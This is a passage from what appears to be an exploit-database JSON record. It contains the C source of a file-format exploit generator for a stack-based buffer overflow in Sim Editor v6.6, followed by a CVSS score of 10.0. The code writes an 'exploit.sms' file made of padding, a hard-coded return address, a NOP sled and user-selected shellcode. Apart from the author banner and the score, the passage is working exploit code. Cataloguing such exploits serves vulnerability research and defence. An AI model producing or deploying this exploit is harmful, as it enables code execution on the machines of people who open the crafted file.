___ ___ \\n\"\n \"|__ | | | | __| . | | _| . | _|\\n\"\n \"|_____|_|_|_|_| |_____|___|_|_| |___|_|\\n\"\n \"\\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\\n\"\n \"[~] Author: Osanda Malith Jayathissa\\n\"\n \"[~] E-Mail: osanda[cat]unseen.is\\n\"\n \"[~] Website: OsandaMalith.wordpress.com\\n\\n\";\n\n fwrite(banner, sizeof(char), sizeof(banner) , stdout);\n}\n\nvoid patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {\n size_t pattern_len = strlen(pattern);\n count *= pattern_len;\n if (count > dst_size) count = dst_size;\n if (pattern_len > dst_size) pattern_len = dst_size;\n\n size_t i, pI;\n for (i = 0, pI = 0; i < count ; i++, pI++) {\n if (pI == pattern_len) pI = 0;\n dst[i] = pattern[pI];\n }\n}\n\nint main() {\n banner();\n int shell_type = menu();\n if (shell_type >= SHELLS_COUNT) {\n printf(\"[-] Enter a valid input\\n\");\n exit (1);\n }\n\n char *buff = (char*) calloc (SIZE, sizeof(char));\n char *nops = (char*) calloc (SIZE, sizeof(char));\n if (!buff || !nops) exit (1);\n\n patternfill(buff, \"41\", 405, SIZE);\n patternfill(nops, \"90\", 16, SIZE);\n\n char ret[] = \"B3804200\";\n const char* filename = \"exploit.sms\";\n\n FILE *outfile = fopen(filename, \"w\");\n if (!outfile) {\n printf(\"%s\\n\",\"Could not open file\");\n exit (1);\n }\n\n fputs(buff, outfile);\n fputs(ret, outfile);\n fputs(nops, outfile);\n\n fputs(shells[shell_type], outfile);\n printf(\"%s\", shell_info[shell_type]);\n fclose(outfile);\n free(buff);\n printf(\"[+] Successfully to written to: \\\"%s\\\"\\n\", filename); \n return 0;\n}\n/*EOF*/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
